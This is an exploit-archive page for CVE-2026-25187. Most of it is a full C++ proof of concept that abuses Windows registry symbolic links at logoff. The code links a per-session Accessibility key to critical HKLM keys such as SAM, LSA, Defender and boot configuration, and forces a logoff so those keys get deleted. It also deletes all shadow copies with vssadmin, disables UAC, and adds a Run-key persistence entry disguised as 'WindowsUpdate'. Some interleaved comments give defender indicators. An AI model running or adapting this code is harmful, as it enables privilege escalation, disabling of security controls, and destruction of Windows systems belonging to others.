
📄 Microsoft WinLogon Registry Deletion / Privilege Escalation

🗓️ 28 Apr 2026 00:00:00 · Reported by indoushka · Type: packetstorm · 🔗 packetstorm.news · 👁 63 Views

Proof of concept that abuses Windows registry symbolic links at logoff to escalate privileges.

Related
Reporter | Title | Published | Family
ATTACKERKB | CVE-2026-25187 | 10 Mar 2026 17:04 | attackerkb
Circl | CVE-2026-25187 | 10 Mar 2026 16:57 | circl
CNNVD | Microsoft Winlogon 后置链接漏洞 | 10 Mar 2026 00:00 | cnnvd
CVE | CVE-2026-25187 | 10 Mar 2026 17:04 | cve
Cvelist | CVE-2026-25187 Winlogon Elevation of Privilege Vulnerability | 10 Mar 2026 17:04 | cvelist
EUVD | EUVD-2026-10659 | 10 Mar 2026 18:31 | euvd
EUVD | EUVD-2026-10660 | 10 Mar 2026 18:31 | euvd
Japan Vulnerability Notes | Security information for Hitachi Disk Array Systems | 25 May 2026 02:39 | jvn
Microsoft KB | March 10, 2026—KB5078734 (OS Build 25398.2207) | 10 Mar 2026 14:00 | mskb
Microsoft KB | March 10, 2026—Hotpatch KB5078736 (OS Build 26100.32463) | 10 Mar 2026 14:00 | mskb
==================================================================================================================================
    | # Title     : WinLogon Registry Deletion Exploit Privilege Escalation PoC                                                      |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : No standalone download available                                                                                 |
    ==================================================================================================================================
    
    [+] Summary    : This code is a highly destructive proof of concept for CVE-2026-25187. It targets Windows WinLogon and registry access-control mechanisms to achieve privilege escalation and compromise system integrity.
                     The exploit abuses registry symbolic links and session-based Accessibility paths so that locations processed during user logoff or session transitions are redirected to sensitive system keys.
    
    [+] POC        :  
    
    #include <Windows.h>
    #include <comdef.h>
    #include <stdio.h>
    #include <vector>
    #include <string>
    #include <map>
    #include <thread>
    #include <chrono>
    #include <sddl.h>
    #include <winternl.h>
    #include <aclapi.h>
    #include <lm.h>
    #pragma comment(lib, "advapi32.lib")
    #pragma comment(lib, "user32.lib")
    #pragma comment(lib, "netapi32.lib")
    #define INTERNAL_REG_OPTION_CREATE_LINK (0x00000002L)
    #define INTERNAL_REG_OPTION_OPEN_LINK (0x00000100L)
    
    // Hand-declared prototypes for the native registry routines this listing calls
    // directly (NtCreateKey, NtOpenKeyEx, NtSetValueKey, NtDeleteKey) plus two Rtl
    // helpers. NtOpenKey is declared but not called anywhere in the listing.
    extern "C" {
        // Called by RegistryUtils::CreateRegistrySymlink to create the link key.
        NTSTATUS NTAPI NtCreateKey(
            PHANDLE KeyHandle,
            ACCESS_MASK DesiredAccess,
            POBJECT_ATTRIBUTES ObjectAttributes,
            ULONG TitleIndex,
            PUNICODE_STRING Class,
            ULONG CreateOptions,
            PULONG Disposition
        );
    
        // Called by RegistryUtils::DeleteRegistrySymlink to open an existing link key.
        NTSTATUS NTAPI NtOpenKeyEx(
            PHANDLE KeyHandle,
            ACCESS_MASK DesiredAccess,
            POBJECT_ATTRIBUTES ObjectAttributes,
            ULONG OpenOptions
        );
    
        // Called by RegistryUtils::CreateRegistrySymlink to write the REG_LINK value.
        NTSTATUS NTAPI NtSetValueKey(
            HANDLE KeyHandle,
            PUNICODE_STRING ValueName,
            ULONG TitleIndex,
            ULONG Type,
            PVOID Data,
            ULONG DataSize
        );
    
        NTSTATUS NTAPI NtDeleteKey(HANDLE KeyHandle);
        NTSTATUS NTAPI NtOpenKey(
            PHANDLE KeyHandle,
            ACCESS_MASK DesiredAccess,
            POBJECT_ATTRIBUTES ObjectAttributes
        );
        
        // Used to turn an NTSTATUS into a Win32 error code for SetLastError.
        NTSTATUS NTAPI RtlNtStatusToDosError(NTSTATUS Status);
        VOID NTAPI RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);
    }
    // Static helpers used by the rest of the listing: resolve the caller's SID,
    // translate hive-prefixed paths into native \Registry\... form, create and
    // delete registry link keys, and recursively delete a key tree.
    class RegistryUtils {
    public:
        // Returns the string form of the SID of the user that owns the current
        // process token, or an empty string if any step fails.
        static std::wstring GetUserSid() {
            HANDLE hToken = nullptr;
            if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
                return L"";
    
            // First call passes no buffer and is used only to learn the required
            // size; its return value is not checked.
            DWORD dwSize = 0;
            GetTokenInformation(hToken, TokenUser, nullptr, 0, &dwSize);
            
            std::vector<BYTE> buffer(dwSize);
            if (!GetTokenInformation(hToken, TokenUser, buffer.data(), dwSize, &dwSize)) {
                CloseHandle(hToken);
                return L"";
            }
    
            PTOKEN_USER pTokenUser = reinterpret_cast<PTOKEN_USER>(buffer.data());
            LPWSTR lpSid = nullptr;
            
            if (!ConvertSidToStringSid(pTokenUser->User.Sid, &lpSid)) {
                CloseHandle(hToken);
                return L"";
            }
    
            // Copy the SID text before freeing the buffer the API allocated.
            std::wstring sid(lpSid);
            LocalFree(lpSid);
            CloseHandle(hToken);
            
            return sid;
        }
    
        // Translates a hive-prefixed path into native form:
        //   HKLM\x -> \Registry\Machine\x
        //   HKU\x  -> \Registry\User\x
        //   HKCU\x -> \Registry\User\<current user SID>\x
        //   HKCR\x -> \Registry\Machine\Software\Classes\x
        // An empty path or one that already starts with '\' is returned unchanged;
        // any other prefix yields an empty string. Prefix matching is case-sensitive.
        static std::wstring RegPathToNative(const std::wstring& path) {
            std::wstring regpath = L"\\Registry\\";
    
            if (path.empty() || path[0] == L'\\')
                return path;
    
            if (path.find(L"HKLM\\") == 0) {
                return regpath + L"Machine\\" + path.substr(5);
            }
            else if (path.find(L"HKU\\") == 0) {
                return regpath + L"User\\" + path.substr(4);
            }
            else if (path.find(L"HKCU\\") == 0) {
                return regpath + L"User\\" + GetUserSid() + L"\\" + path.substr(5);
            }
            else if (path.find(L"HKCR\\") == 0) {
                return regpath + L"Machine\\Software\\Classes\\" + path.substr(5);
            }
            
            return L"";
        }
    
        // Creates a registry link key at `symlink` whose target is `target`.
        // Steps: remove any existing link at that path, create the key with the
        // create-link option (0x2, combined with the volatile or non-volatile
        // option per `isVolatile`), then write the native target path as a
        // REG_LINK value named "SymbolicLinkValue".
        // Returns false, with the thread's last error set, if either native call
        // fails; returns false without touching the last error if a path cannot
        // be translated.
        //
        // Defender note: the artifacts of this routine are a key created with the
        // link option and a REG_LINK value named SymbolicLinkValue. Registry
        // auditing on the path being replaced should record both operations.
        static bool CreateRegistrySymlink(const std::wstring& symlink, const std::wstring& target, bool isVolatile) {
            std::wstring nativeSymlink = RegPathToNative(symlink);
            std::wstring nativeTarget = RegPathToNative(target);
    
            if (nativeSymlink.empty() || nativeTarget.empty())
                return false;
    
            printf("[*] Creating symlink: %ls -> %ls\n", nativeSymlink.c_str(), nativeTarget.c_str());
            // Result ignored: the create below proceeds whether or not this worked.
            DeleteRegistrySymlink(symlink);
    
            UNICODE_STRING name;
            RtlInitUnicodeString(&name, nativeSymlink.c_str());
    
            OBJECT_ATTRIBUTES objAttr;
            InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
    
            HANDLE hKey = nullptr;
            ULONG disposition = 0;
            
            ULONG options = INTERNAL_REG_OPTION_CREATE_LINK | 
                            (isVolatile ? REG_OPTION_VOLATILE : REG_OPTION_NON_VOLATILE);
    
            NTSTATUS status = NtCreateKey(&hKey, KEY_ALL_ACCESS, &objAttr, 0, nullptr, options, &disposition);
            
            if (status != 0) {
                SetLastError(RtlNtStatusToDosError(status));
                return false;
            }
    
            UNICODE_STRING valueName;
            RtlInitUnicodeString(&valueName, L"SymbolicLinkValue");
    
            // The data length is in bytes and excludes the terminating NUL.
            status = NtSetValueKey(hKey, &valueName, 0, REG_LINK, 
                                   (PVOID)nativeTarget.c_str(), 
                                   nativeTarget.length() * sizeof(WCHAR));
            
            CloseHandle(hKey);
            
            if (status != 0) {
                SetLastError(RtlNtStatusToDosError(status));
                return false;
            }
    
            printf("[+] Symlink created successfully\n");
            return true;
        }
    
        // Deletes the link key at `symlink`. OBJ_OPENLINK asks for the link key
        // itself to be opened rather than the key it points to.
        // Returns false if the path cannot be translated, true if the key cannot
        // be opened (for any reason, not only "not found"), and otherwise whether
        // NtDeleteKey succeeded.
        static bool DeleteRegistrySymlink(const std::wstring& symlink) {
            std::wstring nativeSymlink = RegPathToNative(symlink);
            if (nativeSymlink.empty())
                return false;
    
            UNICODE_STRING name;
            RtlInitUnicodeString(&name, nativeSymlink.c_str());
    
            OBJECT_ATTRIBUTES objAttr;
            InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, nullptr, nullptr);
    
            HANDLE hKey = nullptr;
            NTSTATUS status = NtOpenKeyEx(&hKey, DELETE, &objAttr, 0);
            
            // An open failure is treated as "nothing to delete".
            if (status != 0) {
                return true;
            }
    
            status = NtDeleteKey(hKey);
            CloseHandle(hKey);
    
            return status == 0;
        }
    
        // Recursively deletes `subKey` under `rootKey`: every value first, then
        // every subkey (depth first), then the key itself. Returns false if the
        // key cannot be opened, otherwise the result of the final RegDeleteKeyW.
        // In this listing the function is referenced only by its own recursion.
        static bool DeleteRegistryTreeManual(HKEY rootKey, const std::wstring& subKey) {
            HKEY hKey = nullptr;
            if (RegOpenKeyExW(rootKey, subKey.c_str(), 0, KEY_READ | KEY_SET_VALUE, &hKey) != ERROR_SUCCESS) {
                return false;
            }
            DWORD index = 0;
            WCHAR valueName[256];
            DWORD valueNameSize = 256;
            
            // index is incremented in the call and decremented in the body, so
            // enumeration always asks for position 0 again after each deletion.
            // The result of RegDeleteValueW is ignored.
            while (RegEnumValueW(hKey, index++, valueName, &valueNameSize, nullptr, 
                                  nullptr, nullptr, nullptr) == ERROR_SUCCESS) {
                RegDeleteValueW(hKey, valueName);
                valueNameSize = 256;
                index--;
            }
            index = 0;
            WCHAR subKeyName[256];
            DWORD subKeyNameSize = 256;
            
            // Same position-0 pattern for subkeys; the recursive result is ignored.
            while (RegEnumKeyExW(hKey, index++, subKeyName, &subKeyNameSize, nullptr,
                                  nullptr, nullptr, nullptr) == ERROR_SUCCESS) {
                std::wstring fullPath = subKey + L"\\" + subKeyName;
                DeleteRegistryTreeManual(rootKey, fullPath);
                subKeyNameSize = 256;
                index--;
            }
    
            RegCloseKey(hKey);
            return RegDeleteKeyW(rootKey, subKey.c_str()) == ERROR_SUCCESS;
        }
    };
    
    // Driver class for the proof of concept. It replaces the per-session key
    // ...\Accessibility\Session<N>\ATConfig with a volatile registry link to a
    // chosen HKLM key and then forces a logoff; the page summary attributes the
    // impact to what happens to that location during logoff or session
    // transitions.
    //
    // Defender notes, from what the code visibly does:
    //  - artifacts specific to this listing: a link key at the ATConfig path, a
    //    value "exploit_marker" (REG_DWORD 0xDEADBEEF) on target keys, an HKCU
    //    Run value named "WindowsUpdate", and a vssadmin shadow-copy deletion;
    //  - the page's related entries list Microsoft updates KB5078734 and
    //    KB5078736, dated March 10, 2026, alongside CVE-2026-25187.
    class WinLogonEoPExploit {
    private:
        std::wstring m_sessionPath;   // link location; assigned in ExploitMultipleTargets
        std::vector<std::pair<std::wstring, std::wstring>> m_targets;   // label -> HKLM path
        bool m_persistentMode;        // when true, ExploitMultipleTargets calls AddPersistence
        
        // Fills m_targets with label/path pairs for the HKLM keys the tool can
        // point the link at. For defenders this is also the list of keys whose
        // unexpected deletion or modification is worth monitoring.
        void InitializeTargets() {
    
            m_targets = {
                {L"uac_bypass", L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"},
                {L" defender", L"HKLM\\SOFTWARE\\Microsoft\\Windows Defender"},
                {L"security_policies", L"HKLM\\SECURITY\\Policy"},
                {L"lsa_config", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa"},
                {L"sam_key", L"HKLM\\SAM\\SAM\\Domains\\Account"},
                {L"cached_creds", L"HKLM\\SECURITY\\Cache"},
                {L"ci_policies", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\CI\\Policy"},
                {L"code_integrity", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard"},
                {L"uac_settings", L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\UAC"},
                {L"boot_config", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Boot"},
                {L"winlogon", L"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"},
                {L"critical_services", L"HKLM\\SYSTEM\\CurrentControlSet\\Services"},
            };
        }
    
        // Builds the Accessibility\Session<N>\ATConfig path for the session the
        // current process runs in. The result of ProcessIdToSessionId is not
        // checked, so a failure leaves the session number at 0.
        std::wstring BuildSessionPath() {
            DWORD sessionId = 0;
            ProcessIdToSessionId(GetCurrentProcessId(), &sessionId);
            
            wchar_t path[512];
            swprintf_s(path, L"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Session%d\\ATConfig", 
                       sessionId);
            return std::wstring(path);
        }
    
        // Opens or creates the target key under HKLM with KEY_ALL_ACCESS and writes
        // a marker value to it. Returns false only when the path cannot be
        // translated; a failed RegCreateKeyExW is silently skipped and the
        // function still returns true.
        // NOTE(review): presumably this call is refused for a standard user on
        // protected keys; the listing does not show otherwise.
        bool PrepareRegistryTarget(const std::wstring& targetPath) {
            printf("[*] Preparing target: %ls\n", targetPath.c_str());
    
            std::wstring nativeTarget = RegistryUtils::RegPathToNative(targetPath);
            if (nativeTarget.empty()) {
                printf("[!] Invalid target path\n");
                return false;
            }
    
            HKEY hKey = nullptr;
            std::wstring cleanPath = targetPath;
    
            // Only the "HKLM\" prefix is stripped; the key is always opened under
            // HKEY_LOCAL_MACHINE.
            if (cleanPath.find(L"HKLM\\") == 0) {
                cleanPath = cleanPath.substr(5);
            }
            
            if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, cleanPath.c_str(), 0, nullptr,
                                REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nullptr,
                                &hKey, nullptr) == ERROR_SUCCESS) {
                // Marker value; its presence on a key is an indicator that this
                // listing was run against it.
                DWORD dummy = 0xDEADBEEF;
                RegSetValueExW(hKey, L"exploit_marker", 0, REG_DWORD, 
                              (BYTE*)&dummy, sizeof(dummy));
                RegCloseKey(hKey);
                printf("[+] Target key created/verified\n");
            }
            
            return true;
        }
    
        // Deletes whatever tree exists at m_sessionPath (result ignored) and then
        // creates a volatile registry link there pointing at `targetPath`.
        // Returns false if the link could not be created.
        bool CreateMaliciousSymlink(const std::wstring& targetPath) {
            printf("\n[*] Creating malicious registry symlink...\n");
    
            std::wstring pathWithoutHKLM = m_sessionPath;
            if (pathWithoutHKLM.find(L"HKLM\\") == 0) {
                pathWithoutHKLM = pathWithoutHKLM.substr(5);
            }
    
            RegDeleteTreeW(HKEY_LOCAL_MACHINE, pathWithoutHKLM.c_str());
    
            if (!RegistryUtils::CreateRegistrySymlink(m_sessionPath, targetPath, true)) {
                printf("[!] Failed to create symlink: %d\n", GetLastError());
                return false;
            }
            
            return true;
        }
    
        // Ends the current session. Tries, in order:
        //  1. a forced logoff via ExitWindowsEx;
        //  2. InitiateSystemShutdownExW on the local machine with a 5-second
        //     timeout, forced application close and reboot-after-shutdown set to
        //     TRUE, i.e. a restart rather than a logoff, despite the log text;
        //  3. enabling SeShutdownPrivilege on the process token and retrying the
        //     forced logoff.
        // Returns true as soon as one call reports success.
        bool TriggerLogout() {
            printf("\n[*] Triggering user logout...\n");
    
            BOOL result = FALSE;
    
            result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
            if (result) {
                printf("[+] Logout initiated via ExitWindowsEx\n");
                return true;
            }
    
            result = InitiateSystemShutdownExW(nullptr, L"System will logout for maintenance",
                                               5, TRUE, TRUE, 
                                               SHTDN_REASON_MAJOR_APPLICATION);
            if (result) {
                printf("[+] Logout initiated via InitiateSystemShutdownEx\n");
                return true;
            }
            HANDLE hToken = nullptr;
            if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
                TOKEN_PRIVILEGES tp;
                LUID luid;
                if (LookupPrivilegeValueW(nullptr, SE_SHUTDOWN_NAME, &luid)) {
                    tp.PrivilegeCount = 1;
                    tp.Privileges[0].Luid = luid;
                    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
                    // Result not checked; the retry below runs either way.
                    AdjustTokenPrivileges(hToken, FALSE, &tp, 0, nullptr, 0);
                }
                CloseHandle(hToken);
            }
            
            result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
            
            return result != FALSE;
        }
    
        // Writes LastKnownGoodEnabled = 1 under Session Manager\Configuration
        // Manager and runs vssadmin to delete all volume shadow copies. Neither
        // step belongs to the link technique; per the log message both are meant
        // to hinder recovery.
        // NOTE(review): the local is named `disable` but holds 1; what that value
        // means for this setting is not established by the listing.
        // Defender note: process creation of vssadmin with "delete shadows" is a
        // widely used high-signal detection, independent of this CVE.
        void DisableRecoveryMechanisms() {
    
            printf("[*] Disabling recovery mechanisms...\n");
    
            HKEY hKey = nullptr;
            if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, 
                             L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Configuration Manager",
                             0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
                DWORD disable = 1;
                RegSetValueExW(hKey, L"LastKnownGoodEnabled", 0, REG_DWORD, 
                              (BYTE*)&disable, sizeof(disable));
                RegCloseKey(hKey);
            }
    
            // Output and errors are discarded; the exit status is not checked.
            system("vssadmin delete shadows /all /quiet > nul 2>&1");
        }
    
    public:
        // Stores the persistence flag and populates the target list.
        WinLogonEoPExploit(bool persistentMode = false) 
            : m_persistentMode(persistentMode) {
            InitializeTargets();
        }
    
        // Runs the three steps for one target: write the marker to the target key,
        // create the link at m_sessionPath, force the logoff. Returns false at the
        // first step that reports failure.
        bool ExploitSingleTarget(const std::wstring& targetName, const std::wstring& targetPath) {
            printf("\n=== Attacking target: %ls ===\n", targetName.c_str());
    
            if (!PrepareRegistryTarget(targetPath))
                return false;
    
            if (!CreateMaliciousSymlink(targetPath))
                return false;
    
            if (!TriggerLogout()) {
                printf("[!] Failed to trigger logout\n");
                return false;
            }
    
            return true;
        }
    
        // "Mass" mode: computes the session path, optionally adds the Run-key
        // entry, runs DisableRecoveryMechanisms, then walks m_targets creating the
        // link for each entry in turn before forcing a logoff.
        // Every iteration reuses the same m_sessionPath and removes the previous
        // link first, so only one link exists at that path at any moment.
        // Always returns true, including when no link could be created.
        bool ExploitMultipleTargets() {
            printf("\n");
            printf("========================================\n");
            printf("  CVE-2026-25187 - WinLogon EoP Exploit\n");
            printf("  Registry Deletion to SYSTEM\n");
            printf("========================================\n\n");
    
            m_sessionPath = BuildSessionPath();
            printf("[*] Session path: %ls\n", m_sessionPath.c_str());
    
            RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
            
            if (m_persistentMode) {
                AddPersistence();
            }
    
            DisableRecoveryMechanisms();
    
            printf("\n[*] Available targets:\n");
            for (size_t i = 0; i < m_targets.size(); i++) {
                printf("    [%zu] %ls - %ls\n", i, m_targets[i].first.c_str(), m_targets[i].second.c_str());
            }
            
            printf("\n[*] Targeting all critical keys for maximum impact...\n");
    
            for (const auto& target : m_targets) {
    
                RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
                
                if (CreateMaliciousSymlink(target.second)) {
                    printf("[+] Symlink created for %ls\n", target.first.c_str());
    
                    Sleep(100);
                }
            }
    
            printf("\n[*] Triggering final logout for mass deletion...\n");
            // Result ignored.
            TriggerLogout();
            
            return true;
        }
    
        // Registers the running executable under the current user's Run key with
        // the value name "WindowsUpdate", so it starts at each logon of that user.
        // Defender note: autorun monitoring should flag a Run value with this name
        // that points at a binary outside the Windows directories.
        void AddPersistence() {
            HKEY hKey = nullptr;
            if (RegOpenKeyExW(HKEY_CURRENT_USER, 
                             L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                             0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
                
                wchar_t path[MAX_PATH];
                GetModuleFileNameW(nullptr, path, MAX_PATH);
                
                // Size is in bytes and includes the terminating NUL.
                RegSetValueExW(hKey, L"WindowsUpdate", 0, REG_SZ, 
                              (BYTE*)path, (wcslen(path) + 1) * sizeof(wchar_t));
                RegCloseKey(hKey);
                
                printf("[+] Persistence added to HKCU\\Run\n");
            }
        }
    
        // Repeats the replace-the-link loop for five further HKLM keys, again
        // reusing the single m_sessionPath. Always returns true. In wmain this runs
        // after ExploitMultipleTargets has already requested the logoff.
        bool CreateMassiveRegistryCorruption() {
    
            printf("\n[*] Creating massive registry corruption...\n");
            
            std::vector<std::wstring> extraTargets = {
                L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Executive",
                L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management",
                L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL",
                L"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System",
                L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
            };
            
            for (const auto& target : extraTargets) {
                RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
                
                if (RegistryUtils::CreateRegistrySymlink(m_sessionPath, target, true)) {
                    printf("[+] Corruption symlink created for: %ls\n", target.c_str());
                    Sleep(50);
                }
            }
            
            return true;
        }
    };
    
    // Post-run helpers. Both need write access to HKLM keys and use the ordinary
    // Reg* API, not the link technique.
    class PrivilegeEscalation {
    public:
        // Sets EnableLUA and ConsentPromptBehaviorAdmin to 0 under
        // HKLM\...\Policies\System. Returns true if the key could be opened for
        // KEY_SET_VALUE; the results of the two writes are not checked.
        // Defender note: a change of EnableLUA to 0 is a standard registry
        // monitoring target.
        static bool DisableUAC() {
            printf("[*] Disabling UAC...\n");
            
            HKEY hKey = nullptr;
            if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
                             L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
                             0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
                
                DWORD disable = 0;
                RegSetValueExW(hKey, L"EnableLUA", 0, REG_DWORD, (BYTE*)&disable, sizeof(disable));
                RegSetValueExW(hKey, L"ConsentPromptBehaviorAdmin", 0, REG_DWORD, (BYTE*)&disable, sizeof(disable));
                
                RegCloseKey(hKey);
                printf("[+] UAC disabled (requires reboot)\n");
                return true;
            }
            
            return false;
        }
        
        // Despite its name and log message, this only opens and closes
        // HKLM\SECURITY\Policy\Privileges; nothing is written and no privilege is
        // granted. Returns whether the open succeeded. Not called in this listing.
        static bool GrantDebugPrivileges() {
            printf("[*] Granting debug privileges...\n");
            
            HKEY hKey = nullptr;
            if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
                             L"SECURITY\\Policy\\Privileges",
                             0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
                RegCloseKey(hKey);
                return true;
            }
            
            return false;
        }
    };
    
    // Entry point: prints a banner, parses --mass / --persist / --target N /
    // --help, asks for interactive confirmation, then runs either the multi-target
    // mode or a single menu choice. Always returns 0.
    // The help text also lists --disable-uac, but the parser has no branch for it.
    int wmain(int argc, wchar_t* argv[]) {
        printf("\n");
        printf("========================================\n");
        printf("  CVE-2026-25187 - Critical EoP Exploit\n");
        printf("  WinLogon Registry Deletion to SYSTEM\n");
        printf("========================================\n\n");
    
        bool massDeletion = false;
        bool persistent = false;
        int targetIndex = -1;   // -1 means "ask interactively"
        
        for (int i = 1; i < argc; i++) {
            if (_wcsicmp(argv[i], L"--mass") == 0) {
                massDeletion = true;
            }
            else if (_wcsicmp(argv[i], L"--persist") == 0) {
                persistent = true;
            }
            else if (_wcsicmp(argv[i], L"--target") == 0 && i + 1 < argc) {
                targetIndex = _wtoi(argv[++i]);
            }
            else if (_wcsicmp(argv[i], L"--help") == 0) {
                printf("Usage: %s [options]\n", argv[0]);
                printf("Options:\n");
                printf("  --mass        Mass delete multiple critical keys\n");
                printf("  --persist     Add persistence to startup\n");
                printf("  --target N    Attack specific target by index\n");
                printf("  --disable-uac Disable UAC after deletion\n");
                printf("\nWARNING: This exploit will cause system instability!\n");
                return 0;
            }
        }
    
        printf("[!] WARNING: This exploit will delete critical registry keys!\n");
        printf("[!] System may become UNBOOTABLE or severely damaged.\n");
        printf("[!] Continue? (y/N): ");
        
        // Anything other than 'y' or 'Y' aborts before any registry access.
        wint_t ch = towlower(getwchar());
        if (ch != L'y') {
            printf("[*] Exploit aborted.\n");
            return 0;
        }
        
        WinLogonEoPExploit exploit(persistent);
        
        bool success = false;
        
        if (massDeletion) {
            printf("\n[*] Running mass deletion mode...\n");
            success = exploit.ExploitMultipleTargets();
            exploit.CreateMassiveRegistryCorruption();
        } else {
            // This menu is a fixed list of labels printed independently of the
            // label/path pairs stored in the exploit object.
            printf("\n[*] Available targets:\n");
            printf("    0 - UAC Bypass (Disable UAC)\n");
            printf("    1 - Windows Defender\n");
            printf("    2 - Security Policies\n");
            printf("    3 - LSA Configuration\n");
            printf("    4 - SAM (Password Hashes)\n");
            printf("    5 - Cached Credentials\n");
            printf("    6 - Code Integrity\n");
            printf("    7 - Boot Configuration (DoS)\n");
            printf("    8 - ALL (Mass Deletion)\n");
            
            int choice = targetIndex;
            if (choice == -1) {
                printf("\n[*] Select target (0-8): ");
                wscanf_s(L"%d", &choice);
            }
            
            // Choices outside 0-8 fall through with success still false.
            if (choice == 8) {
                success = exploit.ExploitMultipleTargets();
            } else if (choice >= 0 && choice < 8) {
                auto& target = exploit.m_targets[choice];
                success = exploit.ExploitSingleTarget(target.first, target.second);
    
                if (choice == 0) {
                    PrivilegeEscalation::DisableUAC();
                }
            }
        }
        
        if (success) {
            printf("\n[+] Exploit triggered! System will logout now.\n");
            printf("[*] After login, check if target registry keys are deleted.\n");
            Sleep(2000);
        } else {
            printf("\n[!] Exploit failed. Try running again or use different target.\n");
        }
        
        return 0;
    }
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================


28 Apr 2026 00:00 (current)
Vulners AI Score: 5.6 (Medium risk)
CVSS 3.1: 7.8
EPSS: 0.00107